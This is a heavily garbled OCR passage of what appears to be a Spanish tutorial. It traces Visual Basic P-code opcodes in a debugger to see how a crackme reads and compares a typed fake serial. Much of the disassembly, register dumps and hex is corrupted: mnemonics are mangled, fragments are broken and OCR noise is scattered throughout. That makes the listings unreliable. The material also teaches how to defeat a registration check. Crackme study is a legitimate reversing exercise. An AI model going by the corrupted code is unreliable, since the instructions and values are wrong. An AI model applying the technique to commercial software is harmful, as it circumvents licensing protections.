EOEEA »¿ DWORD PTR SS: [EBP-4C] 
MOUZX_EAX, WORD_PTR ESPAI 


olavel.004022E3 


USH_EAX 
2OR EAX, EAX 
MOU AL,BYTE PTR DS: [ESI+2] 
ADD ESÍ,3 
MOUSX EDI,WORD PTR DS: [ESIJ 
MOUSX EY WORD PTR DS: [ESI+21 
ADD ESI,4 
PUSH EAK 
CALL MSUBUMSO. 7413E32A 
SEN] DWORD PTR SS: [ESP],ECX 
E Ú EDI: DWORD PTR DS: CEDI+EBP1] 
ESI, FFFFFFFE 
Y EDX, ECX 
IR ECx,2 
MOUS DWORD PTR ES: [EDIJ,DWORD PTR D: 
ECX, EDX 


ID ECX; 

z E BYTE PTR ES: [EDIJ,BYTE PTR DS: 
ESI,FFFFFFFE 

ESI,DWORD_PTR SS: [EBP-84] 

of switch 

MOU EAX, DWORD PTR DS: [ESI-4] 

a CMP DIORD PTR_SS: [EBP-3C],0 
ol UNZ MSUBUMSO. 74146477 

MOU ESP,ESI 

POP EDI 

POP ESI 

POP EBx 

MOU ESP,EBP 

For EBP 


9 00104 74 FF 21|1"8.0t * 


Y a eso le suma 300 o sea que esta buscando un valor en dicha tabla, el 300 a partir del inicio de la 
misma. 


scites Tit 
jedtác Tit 


SUB! 


bi 
bi 


[Hex _dump____ fascir_ | 


74) (IES Ft 


h Hitp Hit 
3 HItG Hit 
e Hite Hit 
y Hitá hit 


Jo ol Jl Jo Jo Ja Jul Jo Jl fl uo pa pa 
BEREAARREARL A SAD 


O sea que recopilando el opcode anterior guarda el inicio de esta tablita y el Of, localiza en la tabla según 
el parámetro, un valor determinado en la misma. 


MOU EBx, DWORD PTR SS: [EBP-4C] 
PUSH EBXx 

MOUZX EAX, WORD PTR DS: [ESI] 
ADD EAXx, DWORD _PTR DS: [EBXJ 


MSUBUMSO. 74140348 


ADD ESI,3 


MOUSX EDI, WORD PTR DS: CESI 
MAUSX FAX. HARAN PTR MS: FFST 


Case 2F of switch 7413ECBC 


] 
+21 


Luego hay un call a la dirección que lee de dicha tabla ya que como vimos el contenido de EAX es 


(HItO It 
3 HIt e pt 
HHItP Hit 
Hit" pt 
h Htp Hit 
4 HItG It 


e HiteE Hit 
y HMItá Hit 
¿tz at 


OHmtt + nt 
Hits Hit 
iHItó Hit 
b HIt - It 
9 HIt .—It 


mM oMakh Ma 


O sea que ira a 7414c348 no entraremos en el call veremos que nos deja a la salida ya que decia que 
guardaria el valor en el stack. 


Pues sigamos traceando pasemos el CALL con f8 


PUSH EBX 
MOUZX EAX, WORD _PTR DS: [ESI] 
ADD EAX, DWORD _PTR DS: [EBx] 


PUSH_EAX 

20R EAX, ERX 

MOU AL,BYTE PTR DS: [ESI+2] 
mñh PATA 


O sea de todo ese chiste quedo el valor ese en el stack, que ya veremos para que sirve, por ahora sabemos 
como dice la definición, que es un valor que leyo de la tabla de ítems, según el parámetro 0300, y el 
retorno produjo ese valor en el stack. 


Proc: 401c98 


4018D0: 04 FLdRfYar local_008C 
401BD3: 21 FLdPrThis 

401BD4: 0f YCallAd text 

4018BD7: 19 local_0088 

401BDA: 08 FLdPr local_0088 

401BDD: 0d YCallHresult get_ ipropTEXTEDIT 


El próximo OPCODE es el 19, aquí trabajara con la variable local 88, que surgirá de los parámetros del 
opcode. 


MOUZX EAX, WORD PTR DS: [ESI] 
ADD EAX, DWORD PTR DS: [EBX] 


20R EAX, ERX 
MOU AL,BYTE PTR DS: [ESI+2] 
ADD ESI,3 


MOUSX EDI,WORD PTR DS: CESI] 
MOUSX EAX, WORD PTR DS: [ESI+2] 
Ann FST.4 


MSUBUMSO. 7413E59A 


OFEF46 62 
Ban 4 


Allí saltamos a la ejecución del mismo. 


DFEFO6 MOUSX EAX, WORD PTR DS: [ESI] 
ADD ESI,2 

ADD EAX,EBP 

POP ECX 


s1 
Es 301E0000 
3300 XOR EAX, E 


AR 
SA06 MOU AL,BYTE PTR DS:[ESI] 
INC ESI 


46 
FE2485 24ED137: JMP. 


FFFFFF?7S 
JB12FA1C 
ICF4BAB 


12F4E0 
AOTIBDS cla: 


1598 


l 

Fl 
3012F3 

al] 

9 

E 


ogosnos 


Como ya adivinaron ese es el valor -88 en hexa como dice el EXDEC. 


Modify EAX [5] 
Hexadecimal 


Signed a 36 


Unsigned [42949671 60 
Char [FF [NSFF [FF ls 


-136 decimal es igual a -88 en hexa 


.- 
as! a bil 3] > 1]E/M)T/wHjc 
3 ] MOU_EBX,-1 
MOUSX _EAX, WORD PTR DS: [ESI] 
ADD ESI,2 
D EAX,EBP 
POP ECX 
PUSH EBX 


PUSH EAX 
PUSH ECX 


21E0099 
XOR EAX, EAX 
MOU AL,BYTE PTR DS: [ESI] 


Luego incrementa el puntero ESI en 2 y le suma a EBP el valor -88 que es lo mismo que hacer EBP-88 y 
el resultado queda en EAX. 


—= 12F45 
ECX BB12FA1C 
EDX BBCF4BAG 
EBX FFFFFFFF 

BO12F3BC 

EBP 0012F4E0 

ESI 00401BDA cla 

EDI 60159388 


EIP 7413ES517 MSU 
Ci ES 0023 32b 


DA Fo aaiD 20 


1 
m 
107] 
al 


pu] SEA e DS a A ys 
CEE En me ET a] + Em t)w)a] e] JÉ] 
EBXx,-1 
BFEFO6 HOUSS EAX, WORD PTR DS: [ESI] 
8306 02 ADD ESI,2 
B3c5 ADD EAX,EBP 
59 POP ECx 
53 PUSH EBX 
50 PUSH EAXx 
PUSH ECXx 


“NR FOXY FOYw 


E BOCFECAS CFEC 
No 0B12F458 0012F45 
FEFFFFFF [Lara = FFFFFFFF 


MD 


nie 


Al primero es el valor que nos había encontrado y guardado en el stack el opcode anterior, y dos valores 
mas en mi caso 12f458 que es la variable local ebp-88 y un tercer parámetro que es -1, sin entrar en el 
CALL pasémoslo con f8 a ver que pasa. 


Al ejecutarlo vemos que en ebp-88 se guardo el valor hallado por el opcode anterior 


Lo demás quedo todo igual salvo que el stack cambio y que ECX volvió siendo cero, quizás para marcar 
que el proceso fue exitoso. 


O sea que esto movió a EBP-88 el valor que obtuvo del opcode anterior. 


Proc: 401c98 


401BD0: 04 FLdRfYar local_008C 

401BD3: 21 FLdPrThis 

401BDA: 0f YCallAd text 

401BD7: 19 FStádFunc local_0088 

401BDA: local_0088 

401BDD: 0d YCallHresult get_ ipropTEXTEDIT 
401BE2: 6c ILdRf local_008C 

4018BE5: 1b LitStr: Es 


AMAFRA: | eadi3N FoStr 


Llegamos al otro opcode que es 08, que también se ve que trabaja con la misma variable local 88 o sea 
ebp-88. 


ADD ESI,2 
ADD EAX,EBP 


POP ECX 
PUSH EBX 
PUSH EA%x 
PUSH ECx 


SOR EAX, EAX 
MOU AL,BYTE PTR DS: [ESIJ 
INC ESI 


MSUBUMSA. 7413E3D0 


PUSH DWORD PTR SS: [ESP] 


+ EH PELPERRAE 


ADD ESI,2. 
MOU_EAX, DWORD PTR DS: [EAX+EBPI 
OR EAX, EAX 


MOU DWORD_PTR SS: [EBP-4C],EAX 
XOR EAX, ERX 

MOU AL,BVYTE PTR DS:[ESI] 

INC ESI 


MOV EDI.DWORD PTR SS: [EBP-40] 


Este es cortito ahí abajo vemos que termina pues esta el siguiente XOR EAX,EAX que marca la 
finalización del mismo aunque hay un salto condicional en el medio veamos que hace. 


Lo primero, pasa a EAX los parámetros del OPCODE 


¡DOE 
Jr fr jp ja 
100 00 00 00 00 


Al igual que antes es el valor FF78 que al moverlo con MOVSX lo completa con FFs al ser negativo y ya 
vimos que es el -88 hexa. 


¡DON 


MOUSX EAX, WORD PTR DS: [ESI] 
ADD ESI,2 


mou EAX¿DUORD PTR DS: [EAX+EBPI 
OR EAXx, ERX 


MOV DWORD _PTR SS: [EBP-4C7,EAX 
XOR EAX, EAX 
MOU AL,BYTE PTR DS:[ESI] 
INC ESI 


En esa línea directamente suma EAX+EBP lo que le da EBP-88 y luego mueve el valor guardado allí que 
era el famoso, que obtuvimos de la tabla de ítems. 


MOUSX EAX, WORD PTR DS: [ESI] 
ADD ESI,2 

MOU_EAX, DWORD PTR DS: CEAX+EBP] 
OR EAX, EA: 


mou Ed PTR SS: [EBP-4C7, EAX 
XOR EAX, EAX 

MOU AL,BVTE PTR DS:[ESI] 
INC ESÍ 


JMP DWORD PTR DS: [EAX*4+7413ED94] 
MOU_ EDI,DWORD _PTR SS: [EBP-40] 


MM? ENY MANDA DTD Mos TECSTA 


MOUSA EAX, WORD PTR DS: [ESI] 
ADD ESI,2 

MOU_EAX, DWORD PTR DS: [CEAX+EBP] 
OR EAX, EAX 


AE AA AE Y Du S: LEBP-40],EAX 


XOR EAX, ERX 


Guarda ese valor en EBP-4C 
Aquí le vemos sentido a lo que decíamos en el inicio recordemos 


Lo que vemos es que lee el contenido de EBP + 8 (reference pointer) y lo guarda en el contenido de EBP- 
4c (item pointer) 


Como ebp-4c es el puntero de ítems, como este ya confirmo que es valido y que no es cero lo guarda alli, 
en la variable EBP-4c que se usa para eso, por eso se llama ITEM POINTER, ya que este valor lo hallo en 
relación a la tabla de ITEMS. 


MODUS EAX, WORD PTR DS: [ESI] 
ADD ESI,2 

MOU_EAX, DWORD PTR DS: CEAX+EBP 1] 
OR EAX, EAX 


MOU DWORD _PTR SS: [EBP-4C7,EAX 


XOR EAX, EAX 
MOU AL,BYTE PTR DS:[ESI] 
_| INC Es 


3 MOU EDI, DWORD PTR SS: [EBP-4C] 


Llegamos al siguiente opcode 


Proc: 401c98 


401BD0: 04 FLdRfVar local_008C 
401BD3: 21 FLdPrThis 
401BDA: 0f YCallAd text 
401BD7: 19 FStádFunc local_0088 
401BDA: 08 FLdPr local_0088 
c ocal_ [ 
401BE5: 1b LitStr: ds 


Aan1 RE2: l asd/2 EFnaCtr 


bo JE =— 23% +58) Y) 1 IE 0 0 Y 5 5 1 5 8 0 E IS 


Es AL, ponte PTR DS: [ESI] 


MSUBUMSO. 7413E329 


MOU_ EDI, DWORD PTR SS: [EBP-40] 
MOUZA EAX.WORD PTR DS: [ESI] 


Por allí en San Google leo que dicho OPCODE sirve para 
0d VCallHresult +get the text from textbox 


O sea que leerá el serial falso que tipeamos en el textbox, veamos si es cierto, traceemos 


[ol rus Y IGvYY LILA ' ng > dl dl > VU AL YY U —p 


PUSH EAX 

MOUZX EDI,WORD PTR DS: [ESI] 
MOU EAX, DWORD PTR DS: [EAXJ 
ADD EAX, EDI 


MOU EDX, DWORD PTR SS: [EBP-44] 
TEST WORD PTR_DS: [EDxX+76],2 PS 


OR ERX, ERX 


XOR EAX, EAX 
MOU AL,BYTE PTR DS: [ESI+4] 


ADD ESI,5 


Ahí vemos el OPCODE que termina en XOR EAX,EAX como siempre 


Lo primero que hace es leer del puntero EBP-4c, que como dijimos era el ITEM POINTER y lo mueve a 
EAX el archiconocido valor que leyó de la tabla de ITEMS 


MSUBUI 


2-0 DAHDOXXX 


Luego lee un parámetro del OPCODE. 


e OR A E 


MOU EAX, DWORD PTR SS: [EBP-4C] 


PUSH EAx 
MOUZX EDI, WORD PTR_ DS: [ESIJ 
MOU EAX, DWORD PTR DS: LEAX] 
ADD EAX,EDI 


MOV EDX, DWORD PTR SS: [EBP-44] 
201 TEST WORD PTR DS: [EDxX+76].2 


1515] 


EIP 7413E830 MSU 


Y lo pasa a EDI 


Luego lee el contenido de EAX que es el inicio de otra tabla 


BOCF4BA0 
ECx BBBBBBBa 
EDxX BBCF4BRO 
EBX FFFFFFFF 
ESP BB12F3BC 
EBP 0012F4E0 
ESI MB401EDE cl: 
EDI 400000BAD 


FTP 7412F222 MAL 


pp 


1.%.A-*+ 
4/02etó04t 
04th At 
U..tGCet 
at Gt. t 
or-t,Est 
vagt ;»t 
AO4tE-.t 
3 .t48.t 
“y .tÁy.t 
y. .tiy,t 
35y.tÓy.t 
+y.tBz2.t 
L2.t.2.t 
B2.tTz2.t 
h2.t22.t 
áz.táz.t 
12.t32.t 


BBCF4C40 
ECx 4BBBDaBO 
EDxX BOCF4BAB 
EBX FFFFFFFF 
ESP BB12F3BC 
EBP 0012F4E0 
ESI 004B1BDE cl 
EDI 0009000AB 


FTP 7412F22d Ma 


DO 
DOS 
0 
qm 

a La E 
y 

y 


DD 
DODaA 


15) 


Command MEE vl 


Y el realiza un call a la dirección que obtiene de esa tabla, por supuesto no vamos a tracear ese call por 
dentro, vemos que en el stack continúan los valores que obtuvo de los opcodes anteriores 


AARARARA 


Ejecuto el CALL con f8 


Luego mueve a EDX un valor que obtiene del contenido de EBP-44 


A |Registers (FPU) 
e A 


ECX 7C92056D nt 
EDX 66159888 
EBX FFFFFFFF 
= ESP 00 04 
AN EBP 00 
ESI Bn 
EDI OOGaOAS 


CALL _DWÓRD PTR_DS: CEAXJ 
MOU_EDX, DWORD PTR SS: CEBP-44] 
76 0201 TEST_WORD PTR DS: [EDX+761,2 


OR EAXx, ERX 
YOR FOX FOY 


Y luego de testear un par de valores llega al próximo OPCODE, pero ustedes dirán, leyo lo que tipeamos 
o sea nuestro serial falso?, si lo leyó si vemos el EXDEC 


Proc: 401c98 


401BD0: 04 FLdRfYar local_008C 

401BD3: 21 FLdPrThis 

401BD4: Of VCallAd text 

401BD7: 19 FStAdFunc local_0088 

401BDA: 08 FLdPr local_0088 

4018DD: et_ipropTEXTEDIT 
401BE2: 6c ILdRf local_0080. 

401BE5: 1b LitStr: sy 

401BE8: Lead0/30 EqStr 

401BEA: 2f FFree1Str local_008€ 


ana MF 1. Fr... 14. A 


Vemos que a continuación trabaja con la variable local 8c que como sabemos esta en EBP-8C 


Si buscamos el valor de EBP-8c 


209944] E5Ec PE Ec PEJEE PE EC 


y EEPEENEE EENEENEENEE Fl 


Y 
totor 
2 
un 
[ma] 
H 
an E 
man 


Command ? ebp-8c w| HEX: 12F454 - 
1522:2+2+222+2+222+222222++==+ 
Es 12f454 


SEA 
IS 
<93.T+. 


enutpaé: 


Tiersen 
4.014. 
56. 6j2, 
A AO 


Uff costo sangre pero llegamos al punto donde leyó el serial falso. 


El siguiente OPCODE es 6c ILdRf 


Email josephco_(WMhotmail.com with any errors or problems 


Proc: 401c98 


401BD0: 04 FLdRfYar local_008C 

401BD3: 21 FLdPrThis 

401BDA4: 0f VCallAd text 

401BD7: 19 FStádFunc local_0088 

401BDA: 08 FLdPr local_0088 

401BDD: 0d YCallHresult get_ ipropTEXTEDIT 
401BE2: local_008C 

401BE5: 1b LitStr: S 


401BE8: Lead0/30 EqStr 
401BEA: 2f FFreel Str local 008€ 


A eu n50. 7413E85E 


AD AL,BYTE PTR DS: [ESI+4] 


cHP UBOneS 


pic.A4 Ent 


'6C, ILdRf, OC, DO 

'Load reference value, 

'Parameter 1 = 2 bytes. 

'Parameter 1 is offset into local Frame. 

'Offset = 4hC, 

'Address pointer is retrieved from local Frame at offset. 
'Address pointer is pushed onto stack, 

'Stack operations: Push x1. 


Allí dice que este OPCODE es LOAD REFERENCE VALUE veamos entremos en el OPCODE 


OR ERX, ERX 


S0R ERX, EAX 
MOU AL,BYTE PTR DS: [ESI+4] 


ADD ESI,S 
JP DWORD PTR DS: CEAX*4+7413ED094] MSUBUMSB. 74130947 


MOU EAX, 9C68 


Aquí esta 


EXE du] + 1]e]m/1/w)m/c/7]k]: 


BFEFO MOUSA_EAX., WORD PTR DS: [ESI] 
34: PUSH_DWORD PTR DS: CEAX+EBP] 


XOR EAX, EAX 
mMOU ia PTR DS: [ESI+2] 


ADD Sud 


Que es -8c en hexa 


[0] File View Debug Plugins Options Window Help 


MOUSA AA PTR DS: [ESI] 
pa DWORD PTR DS: CEAX+EBP] 


EAX, ERX 
MOU AL,BYTE PTR DS: [ESI+2] 
ADD ESI,3 


AFREAR SA MMUSe FAR. MARN PTR MS:FFSTI 


En la próxima instrucción lo suma a EBP, con lo cual obtiene EBP-8c y pushea el contenido o sea que 
seria equivalente a PUSH [ebp-8c] 


BB1SD3BC 
5ls151s]515]515) 
151s1515]5]5]515) 


19]519]5 12151: 
ARARRAAR 


Pero en el contenido de ebp-8c tenia un puntero al serial falso, por lo cual ahora tenemos el puntero alli 
en el stack. 


B 
a 
B 


Si lo vemos en el dump vemos claramente que apunta al serial falso, vemos porque llaman al OPCODE, 
LOAD REFERENCE VALUE, pues carga al stack un valor que vamos a usar desde una variable local. 


El próximo opcode es 
1b LitStr por allí leo que significa Literal String 


Veamos que hace 


—= PIE. — view  DEDUG FIS Opuurns —VYIMUUwW  HEIp 


MOUSX_EAX, WORD PTR DS: [ESI] 
PUSH_DWORD PTR DS: CEAX+EBP] 
XOR EAX, EAX 

MOU AL,BYTE PTR DS:[ESI+2] 
ADD ESI,3 


MSUBUMSO. 7413DE59 
MOUSX_EAX, WORD PTR DS: [ESI] 


, 13 
85 
46 
E PUSH_DUORD_PTR_DS: LEAXIEBPI, 


AO 66 06 BO El 14 FF 
2/61 00 FB 30 2F 74 FF 1A 
] 1C 26 00 1E En ls] 

AIFE 11 5d FF.10 14 AR AR 


6BB159838 


FEFFFFFF 
BB12F3CO 
OD12F4EO 
OO4B1BES 
0OBGBBAS 


EIP 7413DESC M 


sa ra anana 


LES 2110 »ijY] $0 9] > L/E]mMT|¡WwjH]|cj/]KjB|R]».. 


MOUZA_EAX, WORD _PTR DS: [ESI] 

MOU EDX, DWORD PTR SS: [EBP-54] clavel. 004017E4 
PUSH_DWORD PTR DS: CEDX+EAx*4] 

XOR EAX, ERX 

MOU AL,BYTE PTR DS: [ESI+2] 

ADD ESI,S 


| moUsX_EDI,WORD PTR DS: CESI] 


Vemos que en la próxima línea mueve a EDX un valor 4017E4 no sabemos que es sigamos. 


[0] File View Debug Plugins Options Window Help 


mex] e Jn] vis] $0] e] + ojejm]t]wjn]c]7[x]8/R]»..] 


1413DE59| BFB7D6 MOUVZX EAX, WORD _PTR DS: CESI] 
7413DES5C|  SB55 AC MOU EDxX,DWORD_PTR SS: [EBP-54] 
PUSH TN DS: [EDX+EAX%*4] 


clavel. 004016F3 


7413DE62 XOR EAX 

7413DE64 MOU AL, BVTE PTR DS:[ESI+2] 
7413DE67 ADD ESI,3 

741 ANFAR MP AMUNAN PTR NS: TFAX*4+7412FM941 


Y que pushea un valor 4016f8 que puede ser? 


Proc: 401 c98 


401BD0: 04 FLdRfYar local_008C 

401BD3: 21 FLdPrThis 

401BD4: 0f VCallAd text 

401BD7: 19 FStádFunc local_0088 

401BDA: 08 FLdPr local_0088 

401BDD: 0d YCallHresult get_ ipropTEXTEDIT 
401BE2: 6c ILdRf local_008C 


401BES5: ESA 
401BE8: Lead0/30 EqStr 
401BEA: 2f FFree1 Str local 008€ 


Vemos que la aclaración del EXDEC nos muestra unas comillas, o sea que este valor que movio al stack 
apunta a una string vacía. 


UNICODE "39 


Y 


Y 


Y 


Pues si vemos en el dump que apunta a una string vacia que termina en comillas, o sea lo que hará en el 
siguiente opcode será chequear si tipeamos algo, o si dejamos vacío el textbox y apretamos register. 


[0] File View Debug Plugins Options Window Help 


EXENTOS a > 


MOUZX EAX, WORD _PTR DOS: [ESI] 
MO as DWORD _PTR SS: [EBP-54] 
PUSH DUÓRO., PTR DS: [EDX+EA%*4] 
XOR EAX,E 

MOU AL, byte PTR DS: [ESI+2] 


ADD ESI 


E MOUSA EDI,WORD PTR DS: [ESI] 
ADD ESI.2 


AUIBEZ: bC ILOHI local_UUBL 
401BES5: 1b LitStr: 1 


40168: [ETE El 


401BEA: 2f FFreel Str local 008€ 


Bueno LEAD 0 es una operacion y según la segunda parte del OPCODE será la operación que realiza en 
este caso 30 Eq Str que vemos en San Google 


Lead0/30 EqStr <---Compara dos strings 


O sea que va a comparar esas dos strings este es un OPCODE doble o sea que primero lee el primero que 
es FB salta el JMP indirecto 


92056D ntdl 
004017E4 cla 
BX FFFFFFEF 


Y allí nomás termina el primer OPCODE con XOR EAX,EAX sin hacer nada y lee el segundo OPCODE 


ES 0] vis] $4 8] + LJEJMTIWHC]+ 


XOR EAX, EAX 
MOU AL,BVTE PTR DS:[ESI] 
_| INC Esi 


XOR EAX.ERX 


20 “at $ Y] 5] 0 E E E O 
330 XOR EAX, EAX 


OU AL,BVTE PTR DS: [ESI] 
_|INC E 


XOR EAX, EAX 


md o RATA na rrara 


Allí lee el segundo OPCODE 30, diferenciamos en este caso un OPCODE doble, de leer parámetros del 
un OPCODE, porque la diferencia esta en que en un OPCODE DOBLE se cierra el primer OPCODE con 
el XOR EAX.EAX y ahí recién se lee el segundo OPCODE, en el caso de lectura de parámetros el primer 
OPCODE queda abierto y no se cierra al leerlos. 


premadl PPA P  Pretl PS A 1 A 1 Pa | — Y Y Y SS Y SY SY Y Y 


EAX, EAX 
MOU AL,BYTE PTR DS:[ESI] 
INC ESI 


DODO 
DO 


Y quedan los tres argumentos al llegar al CALL pasémoslo con f8 y veamos lo que cambio. 


Vemos que el stack se movió pero los valores continúan sin modificación un poco mas arriba. 


Vemos que en la siguiente línea CMP AL,O lo cual me dice que allí en AL, guarda el resultado en mi caso 
es 


isters (FPU) 
« BB150 
: soruls E 


l FEFEFEFF 
SP BB12F3C4 

> BBL2F4EO 
SI IMBABIBER! cl 


4 74123ER99 msuIl 


To aaa “mk 


Porque las strings no son iguales 


[c] File View Debug Plugins Options Window Help 


CEE En a $10 1) +) 1]elmtiwn] 


EAX, EAX 
MOU AL, BYTE PTR DS:[ESI] 


SALA ar Th FAT 


Luego de la comparación mueve a EAX el valor cero y como resultado de todo esto termina 
PUSHEANDO el cero al stack, lo cual es el resultado del OPCODE, da cero en el stack si no son iguales, 
si hubieran sido iguales daría FFFFFFF si quieren probar háganlo jeje. 


EZ 7 BORO aio Y TT y Y | 


MOU AL,BYTE PTR DS:[ESI] 
_| INC Esi 


POP EDX 
POP ERX_.. 


Llegamos al siguiente OPCODE 


401BE8: Lead0/30 EgStr 
A01BEA: 2f FFrec1StH local_008C 
401BED: la FFreelAd local_0088 


401BF0: 1c BranchF: 401BF6 


San Google nos dice que es similar a SysFreeString que libera una string cuando ya no se usa, veamos en 
este caso liberaría la de ebp-8c (local 8c) 


ZA O SO E ES E E ANS JN DS ES E IS ES 
rs 1000000 MOV EDI, 1 
MOUSX EBX,WORD PTR DS: [ESI] 
ADD ESI,2 
PUSH DubRo PTR_DS: [EBX+EBP] 


26 00000661 MOU DWORD PTR DS: CEBX+EBP],0 


XOR EAX, 
es AL, Poe PTR DS: [ESI] 


6FAÍ — MFREZF A MMuSe ENT-MARN PTR MS:FESTI De 


Veamos mueve a EDI el valor 1, luego el FF74 que es -8c en hexa como siempre con el MOVSX para 
llenar con FFs si es negativo. 


A |Registers (FPU) 
——|ERX BuBBBBZF 
EN Ba4B16FS clave 


clave 
EBX 
ESP 
EBP 0012F4E0 


ESI B0401BEB clave 
EDI 00000081 


EIP 7413E6CF MSUBL 


CO ES 0623 32bit 
P10 05 ARIR 22hit 


— 


MUVS_EBX, WURU PIR US: LESIJ 
ADD ESI,2 
PUSH Dl : CEBX+EBP] 


pls 1515]51515]2] 
19J5]515]5 151512) 
(als 15] 151512) 
ARRARARAR 


ud 


uba 


ru vw IiSvvY LEA y mun > dl td > VU MAL ' —.p 


EXE +0] ele] $30) e] +] 1jelmtiwn]c]Jk]B/R]» Js] 


ES ARA 
D 64F01474 1CMP_ DWORD PTR 0S:[7414F064],0 


MOU EAX, DWORD PTR DS: [7414F068] 
PUSH EAX 


kernel(32.TlsGetValue 


MOU ECX, DWORD PTR DS: [EAx+18] 
MOU EAX, DWORD PTR DS: [ECX+14] 
MOU EDX, DWORD PTR DS: [EAXxJ 

MOU DWORD PTR DS: [ECX+14],EDX 


mit FOX AMARA 


DDD 
Su La Sa 


hE 


c3 
01 E£NFA1A7A PTR NS+T741ádFaAErT 


Vemos que dentro de ese call va a la api SysFreeString , y al retornar 


A SI E O A NO DS DY LEN EN NS, NES NS NS NS NS 
MOV EDI, 1 
MOUSX EBX,WORD PTR DS: [ESI] 
ADD ESI,2 
PUSH DWORD PTR_DS: CEBX+EBP] 
er 


palalalalalz] an O PTR DS: [EBX+EBP1,0 


“NR FOXY FOw 


3. 
02 E3 13 74 ES F4 12 00 OdItpI+. 
a6aR a6aA AA aa AA ARA AR AR 


Ojo no borro el serial falso, este sigue estando en 15d3bc lo que borro es el puntero al mismo que estaba 
en EBP-8c. 


34 MOU OWORD PTR DS: CEBX+EBPJ],0 
DEC EDI 


A 
MOU AL,BYTE PTR DS:CESI] 
NC ESI 


| HOUSX_EDI,WORD PTR DS:[ESI] 


Alli llega al siguiente OPCODE 


401BED: la FFreelAd local_0088 
401BF0: 1c BranchF: 401BF6 
401BF3: 1e Branch: 401c94 
ANÑ1ADOEC> il naddinad l itidaserl A+ fllanal 2DECECNM 


Este seguro borrara el contenido de la variable local ebp-88 


Que había allí? 


DO4DILHS] 00 YUU UY 


w | HEX: 12F458 - [ 


Commanc ? ebp- 8 


Ao. y Ie. 
s$.<75. 


Br. 
3 ..90!lt 
b 


y E 


15) 


540.540: 
SL. Ad. 
.0.. 843. 


Ah el valor que había hallado de la tabla de ítems, seguro lo borrara veamos, ya nos estamos haciendo 
mas prácticos jeje. 


> TE 


EF 01000000 MOU EDI, 1 
OFBFIE MOUSX EBX,WORD PTR DS: [ESIJ 
Có6 62 ADD ESI,2 
142B MOU_EAX, OWORD PTR DS: CEBX+EBP] 
A OR EAX, EAX 
7413 vw 74 BD JE SHORT MSUBUMSO. 7413E745 


A 


151) 


ADD ESI,2 
MOU_EAX, DWORD PTR DS: [EBX+EBPI 
OR EAX, EAX 


DORA 
DO MM 
e 


3 PUSH_EAX 
3B0B mou En; DIORD PTR DS: [EAXI 
lA MA 


MOU EAX, DWORD _PTR DS: CEA*X] 


FFso 63 MSUBUMSO. 7405E258 
Cr642B 400600561 MOV DWORD PTR DS: CEBX+EBP],0 

4F DEC EDI 

TF ES 

3300 XOR EAX, EAX 


Y ira a un call que como antes liberara el valor este, y luego borrara el contenido de ebp-88. 


EC F4 1 
3C BB C 
ERE 


2 mm e 


Allí esta puesto a cero. 


XOR EAX, EAX 
MOU AL,BYTE PTR DS: [ESIJ 
INC ESI 


ADD ES 

SHR EDI. 1 
El próximo OPCODE es 
401BEA: 2f FFreelStr local_008C 
401BED: la FFreelAd local_0088 
401BF0: 1c EX: 401BF6 
401BF3: 1e Branch: 401c94 


401BF6: Lead3¿c1 LitVarl4: [local_3BE500AC 


Es un salto condicional ya que todos los BRANCH son saltos 


Instrucción Opcode Significado 
Branch le Salto incondicional. 
BranchF le Salta si False. 

BranchT 1d Salta si True. 


O sea que es un salto si es falso y a continuación hay un JMP o sea que este salto al ver que tipeamos algo 
en el textbox salta a la comparación del serial, si no volvería a repetir el proceso con el JMP. 


Veamos si es cierto, si esto salta, el próximo opcode debería ser 


401BED: la FFreelAd local_0088 

401BF0: 1c E: 401BF6 

401BF3: 1e Branch: 401c94 

401BF6: Lead3/c1 LitVarl4:  (local_3BE500AC)] 0x3c41a (246810) 
AMRFF: | ead1HR FSiVar Incal MNAC 


Ya que este salto condicional evita el JMP de 401bf3 


[c] File View Debug Plugins Options Window Help 


1403) 1 eje] $0 ul +] 1jejmtiwn]e] 


MOUZX ESI,WORD PTR DS: [ESI] 
ADD ESI, DWORD PTR SS: [EBP-58] 
XOR EAX, EAX 

MOU AL,BYTE PTR DS:[ESI] 


INC ESI 


S0R EAX, EAX 


A MITE ATA Ne rrerian 


Allí termina el opcode y lee el próximo 


ADD ESI, po PTR SS: [EBP-58] 
XOR EAX, EAX 
MOU AL.BYTE PTR DS: [ESI] 
INC ESI 


"| ROR EAX, EAX 
HOU AL.ÉYTE PTR DS:CES1+21 
[aDD Est 
POP ECX 
OR CX,0X 


XOR EAX, ERX 
mou AL, BYTE PTR DS: [ESI+2] 


CMP- EAX, EDX 


PUSH_EAX 

mou En EN 

XOR EAX, EAX 

MOU AL,BVYTE PTR DS:[ESI] 
INC ESI 


FRNDINT 
SUB _ESP,4 
FISTP WORD PTR SS: [ESP] 
FSTSW_ AX 
TEST AL,BD 


XOR EAX, EAX 
MOU AL,BYTE PTR DS:CESI] 
__| INC Es 


Que como suponíamos es el FE de 401bf6, así que el salto condicional salto y evito el JMP, jeje. 


Lead3/c1 LitVarl4 


Este es un OPCODE doble veamos que hace 


XOR EAX, EAX 

MOU AL,BYTE PTR DS:[ESI] 
| INC ESI 

| XOR EAX, EAX 

MOU AL.BYTE PTR DS:[ESI] 


Allí cierra el primer OPCODE y lee el segundo 


m4] PH] vs $33) 9) + MEA 
EB_ 63000000 MOU_EBX,3 
BFEFSE MOUSX EDI,WORD PTR DS: [ESI] 
66:3891C2F MOU WORD _PTR_DS: [EDI+EBP],BX 
ES dd puc PTR DS: [ESI+2] 


89442F 08 MOU DUORO PTR_DS: CEDI+EBP+8],EAX 
¿MP SHORT MSUBUNMSO. 7413DEEO 


AA APA Mn ma 


El 1 26 06 1E C4 66 FE 


Lee los parámetros del opcode 


EIP 7413DEF? MSUI 


CO ES B023 


MOU EBx,3 


MOU EAX 
ADD ESI,6 


MOV EBx25 ... 


00 1€ 04 00 FE 
A C4 FC 


BF al 
8 FF 08 78 FF 
B 60 6. 74 FF 
4 00 FD 6B 54 


DDD 


: 4 
ESI IMBABIBES! ol 
EDI FFFFFFS4 


EIP 7413DEFE MSL 


B 
MOUSX EDI,WORD PTR DS: [ESI] 
MOU WORD _PTR Mn LEDISEB5], BX 


MOU DWORD PTR DS: CTEDI+EBP+87,EAX 


ADD E 


POP ERX 
SUB WORD PT 


MOU EBX,3 

MOUSX EDI,WORD PTR DS: [ESI] 
MOU WORD _PTR DS: CEDI+EBPI,Bx 
mou Bare Cero PTR DS: [ESI+2] 


mou GuoRO PTR DS: [EDI 


MOU EBX,S 
MOUSX EDI, WORD PTR DS: [ESI] 
MOV WORD PTR DS: CEDI+EBP1.BX% 


Y esperen que aun no termino que el jmp nos lleva a 


